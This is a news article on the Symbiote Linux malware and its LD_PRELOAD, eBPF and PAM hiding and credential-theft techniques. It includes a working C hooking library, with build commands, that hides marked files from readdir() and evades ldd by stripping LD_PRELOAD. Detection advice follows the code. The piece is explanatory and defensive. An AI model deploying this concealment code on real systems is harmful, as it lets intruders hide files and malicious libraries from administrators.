Symbiote is Linux malware that uses eBPF and LD_PRELOAD to hide

Researchers at Intezer and BlackBerry have discovered malware codenamed Symbiote, which is used to plant backdoors and rootkits on compromised Linux servers. The malware was found on systems belonging to financial institutions in several Latin American countries. Installing Symbiote requires root access, which an attacker can obtain, for example, by exploiting unpatched vulnerabilities or by using leaked credentials. Once in place, Symbiote lets the attacker keep a foothold on the system after the compromise for further attacks, hide the activity of other malicious programs, and intercept sensitive data.

What sets Symbiote apart is that it is distributed as a shared library which is loaded into every process at startup through the LD_PRELOAD mechanism and replaces some of the standard C library's functions. The substituted handlers hide backdoor-related activity: they exclude certain entries from the process list, block access to certain files under /proc, hide files in directories, keep the malicious library out of ldd output (execve is intercepted and calls whose environment carries LD_TRACE_LOADED_OBJECTS, the variable ldd sets, are handled specially), and omit the network sockets associated with the malicious activity.
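The hooking technique described above, as an added illustration that is not Symbiote's own code: a small LD_PRELOAD library that replaces libc's readdir() to drop directory entries carrying an assumed "hidden_" prefix, and replaces execve() to recognise an ldd run by the LD_TRACE_LOADED_OBJECTS variable. The prefix, and the choice to stay out of ldd output by stripping LD_PRELOAD from the traced program's environment, are this example's assumptions; the article only says that Symbiote intercepts execve and inspects that variable.

```c
/* Added illustration of an LD_PRELOAD hooking library (not Symbiote's code).
 * It replaces two libc entry points in every dynamically linked process that
 * loads it: readdir(), to drop directory entries that start with an assumed
 * "hidden_" prefix, and execve(), to recognise an ldd run by the
 * LD_TRACE_LOADED_OBJECTS variable that ldd places in the environment.
 *
 * Build and try (Linux, glibc; -ldl is only needed before glibc 2.34):
 *   gcc -shared -fPIC -o preload_demo.so preload_demo.c -ldl
 *   mkdir -p /tmp/d && touch /tmp/d/hidden_a /tmp/d/visible_b
 *   LD_PRELOAD=$PWD/preload_demo.so ls /tmp/d   # only visible_b is listed
 *   ls /tmp/d                                   # both entries are back
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define HIDDEN_PREFIX "hidden_"    /* assumed marker for entries to drop */
#define LDD_TRACE_VAR "LD_TRACE_LOADED_OBJECTS="
#define PRELOAD_VAR   "LD_PRELOAD="

/* Return 1 if a directory entry name should be filtered out of readdir(). */
int is_hidden_name(const char *name)
{
    return name != NULL &&
           strncmp(name, HIDDEN_PREFIX, sizeof(HIDDEN_PREFIX) - 1) == 0;
}

/* Return 1 if the environment block requests the dynamic loader's trace
 * mode. ldd works by running the target with LD_TRACE_LOADED_OBJECTS set,
 * so an execve() hook can tell that an ldd check is about to happen. */
int env_requests_ldd_trace(char *const envp[])
{
    if (envp == NULL)
        return 0;
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], LDD_TRACE_VAR, sizeof(LDD_TRACE_VAR) - 1) == 0)
            return 1;
    return 0;
}

/* Hooked readdir(): fetch the real libc readdir() through RTLD_NEXT and skip
 * every entry that matches the marker. A statically linked tool, or one that
 * calls getdents64() itself, never loads this library and sees everything. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    struct dirent *ent;

    if (real_readdir == NULL)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    if (real_readdir == NULL)
        return NULL;
    while ((ent = real_readdir(dirp)) != NULL && is_hidden_name(ent->d_name))
        ;                       /* swallow hidden entries, return the next one */
    return ent;
}

/* Hooked execve(): when the environment shows an ldd trace run, hand the
 * target a copy of the environment without LD_PRELOAD, so the traced program
 * never loads this library and ldd does not list it. This is the demo's own
 * way of hiding from ldd, not a claim about how Symbiote does it. */
int execve(const char *path, char *const argv[], char *const envp[])
{
    static int (*real_execve)(const char *, char *const[], char *const[]) = NULL;

    if (real_execve == NULL)
        real_execve = (int (*)(const char *, char *const[], char *const[]))
                      dlsym(RTLD_NEXT, "execve");
    if (real_execve == NULL)
        return -1;

    if (envp != NULL && env_requests_ldd_trace(envp)) {
        size_t n = 0;
        while (envp[n] != NULL)
            n++;
        char *clean[n + 1];
        size_t j = 0;
        for (size_t i = 0; i < n; i++)
            if (strncmp(envp[i], PRELOAD_VAR, sizeof(PRELOAD_VAR) - 1) != 0)
                clean[j++] = envp[i];
        clean[j] = NULL;
        return real_execve(path, argv, clean);
    }
    return real_execve(path, argv, envp);
}
```

The same code shows where the check belongs on a suspect host: listing the directory with a statically linked tool (or comparing readdir() output against raw getdents64() results) restores the hidden entry, because a static binary never loads the preloaded library. The library names in /etc/ld.so.preload and in the LD_PRELOAD variable of running processes are the first places to look for a library that is not supposed to be there.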

To defeat traffic inspection, the library redefines functions of libpcap, filters what is read from /proc/net/tcp, and loads an eBPF program into the kernel that keeps traffic analyzers from seeing the backdoor's traffic and drops third-party requests aimed at the attacker's own network handlers. The eBPF program is installed among the first handlers and runs at the lowest level of the network stack, which hides the backdoor's network activity even from analyzers started later.

Symbiote can also slip past some file-system activity monitors, because sensitive data is stolen not at the point where files are opened but by intercepting the read operations that legitimate applications perform on those files (for example, the substituted library functions make it possible to capture a password typed by a user or access-key material loaded from a file). For remote access, Symbiote intercepts some PAM (Pluggable Authentication Modules) calls, which lets the attacker log in to the system over SSH with a specific set of credentials. There is also a hidden option to elevate privileges to root by setting the HTTP_SETTHIS environment variable.

Source: opennet.ru
